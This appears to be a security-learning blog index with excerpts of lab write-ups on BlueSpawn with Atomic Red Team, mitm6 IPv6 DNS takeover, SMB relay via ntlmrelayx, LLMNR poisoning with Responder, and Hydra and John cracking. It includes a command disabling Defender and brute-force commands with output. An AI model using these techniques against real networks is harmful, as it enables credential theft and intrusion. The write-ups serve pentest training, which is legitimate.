MujereSec101

 Bluespawn In this lab we will be using Bluespawn as an alternative for an EDR system. Normally full EDRs like Cylance, Symantec and Crowdstrike are very expensive and tend not to show up in classes like this. BlueSpawn will monitor the system for "weird" behavior and note it when it occurs. In this lab, we will be starting BlueSpawn and then running Atomic Red Team to trigger a lot of alerts. First, let’s disable Defender. Simply run the following from an Administrator PowerShell prompt: Set-MpPreference -DisableRealtimeMonitoring $true This will disable Defender for this session. If you get angry red errors, that is Ok, it means Defender is not running. Let's get started by opening a Terminal as Administrator:  Now, let's open a command Prompt: Next, let’s change directories to tools and start Bluespawn: C:\Users\adhd>cd \tools C:\tools>BLUESPAWN-client-x64.exe --monitor --level Cursory Now, let’s use Atomic Red Team to test the monitoring with BlueSpawn: Firs...

 Compromising IPv4 networks via IPv6 While IPv6 adoption is gaining traction, company networks that use IPv6 internally are quite rare. However, most companies are unaware that while IPv6 might not be actively in use, all Windows versions since Windows Vista (including server variants) have IPv6 enabled and prefer it over IPv4. In this write-up, we explore an attack that abuses the default IPv6 configuration in Windows networks to spoof DNS replies by acting as a malicious DNS server and redirect traffic to an attacker specified endpoint or relay. We can abuse this exact functionality to gain control over the network and potentially dump the NTLM hashes from ntds.dit, create user, add user to privilege group e.g. Enterprise Admin, etc present in the domain controller. The ntds.dit file is a database that stores information about user objects, groups and group memberships, and password hashes for all users in the domain This attack attempts a DNS takeover in a network via IPv6 using...

  What is mitm6? mitm6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server. It does this by replying to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attackers host as default DNS server. As DNS server, mitm6 will selectively reply to DNS queries of the attackers choosing and redirect the victims traffic to the attacker machine instead of the legitimate server. reference: https://github.com/dirkjanm/mitm6 Dependencies and installation mitm6 is compatible with both Python 2.7 and 3.x. You can install the requirements for your version with "pip install -r requirements.txt". In my case, I have to use the ff command "pip3 install" as "pip install -r requirements.txt" does not work for me. To start with, Go to Google search and look for "github mitm6" then clone the repository. ┌──(root㉿kali)-[/opt] └─# git clone https://github.com/dirkjanm/mitm6.git    Depende...

  #SMB Relay Attack Overview SMB is commonly used for sharing files, printers and communication between client and server. Before one can communicate with the other, the user will be required to authenticate themselves. This is simple access control. Although this control can help protect those important files, it can also be manipulated to allow authentication attempts to be relayed and used to access systems. It can also be abused in order to collect password hashes. This is where SMB relay comes into play. The attacker places themselves in the middle (MiTM) and relays the attempts. Once the end server has validated the credentials, the access is granted to the attacker instead of the user. What is SMB Relay Attack? A SMB relay attack is where an attacker captures a users NTLM hash and relays its to another machine on the network. Masquerading as the user and authenticating against SMB to gain shell or file access. Prerequisites SMB Signing disabled on target Must be on the local...

Ntlmrelayx.py is as python script that will simply relay NTLMv1/v2 hashes. Installing it is just straight forward on Kali Linux. Step 1:  Install the dependencies Ldapdomaindump is needed first, which can be installed by typing ┌──(root㉿kali)-[/home/kali/ActiveDirectory] └─# pip install ldap3 dnspython ┌──(root㉿kali)-[/home/kali/ActiveDirectory] └─# pip install ldapdomaindump Step 2: Once the dependencies are installed, download the impacket suite ┌──(root㉿kali)-[/home/kali/ActiveDirectory] └─# git clone https://github.com/CoreSecurity/impacket.git Once downloaded, go to the directory and install it ┌──(root㉿kali)-[/home/kali/ActiveDirectory/impacket] └─# python setup.py install And once installed, You can now run Impacket, run ntlmrelayx.py from any directory now. ┌──(root㉿kali)-[/home/kali/ActiveDirectory/impacket] └─# ntlmrelayx.py -tf target.txt -smb2support

In this write-up we will talk about LLMNR/NBT-NS Poisoning as this attack vector is still prevalent nowadays. Vast majority of assessments result in obtaining NTLMv1 and NTLMv2 hashes which can be taken advantage to crack these hashes and gain Administrator access. In our example, we will use the tool called "RESPONDER" to intercept traffics from the network and to gather these NTLMv1 and NTLMv2 hashes to our advantage then we will talk about the overview on how these attack's kind of work. LLMNR/NBT-NS Poisoning Overview Attackers can spoof an authoritative source for name resolution on a victim network by responding to LLMNR(UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. What is LLMNR? -Used to identify hosts when DNS fails to do so -Previously NBT-NS -Key flaw is that the services utilize a user's username and NTLMv2 h...

hydra -l user -p fasttrack.txt ssh://192.168.220.131 -V -I -F -t 40 ┌──(root㉿kali)-[/usr/share/wordlists] └─# hydra -l jeanpaul -p fasttrack.txt ssh://192.168.220.131 -V -I -F -t 4 Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-07 00:31:22 [DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task [DATA] attacking ssh://192.168.220.131:22/ [ATTEMPT] target 192.168.220.131 - login "jeanpaul" - pass "fasttrack.txt" - 1 of 1 [child 0] (0/0) 1 of 1 target completed, 0 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-07 00:31:24 JohnTheRipper: john /tmp/hashes --wordlist /usr/share/wordlists/fasttrack.txt --format=crypt Password Store in Windows: NTDS.DIT, SAM file, Reg...